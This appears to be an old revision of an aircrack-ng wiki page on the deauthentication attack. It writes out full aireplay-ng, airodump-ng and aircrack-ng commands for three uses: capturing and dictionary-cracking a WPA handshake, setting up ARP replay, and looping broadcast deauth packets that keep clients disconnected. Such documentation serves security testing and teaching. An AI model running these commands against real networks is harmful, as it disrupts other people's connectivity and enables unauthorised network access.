This is an old revision of the document!
Of course, this attack is totally useless if there are no associated wireless clients.
It is usually more effective to target a specific station using the -c parameter.
airmon-ng start ath0 airodump-ng ath0 out 6 (switch to another console) aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0 (wait for a few seconds) aircrack-ng -w /path/to/dictionary out.cap
airmon-ng start wlan0 airodump-ng wlan0 out 6 (switch to another console) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
airmon-ng start ra0 aireplay-ng -0 0 -a 00:13:10:30:24:9C ra0
With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmwares ignore deauthentications sent to broadcasts, so you need to send them directly to them using the -c option as described above.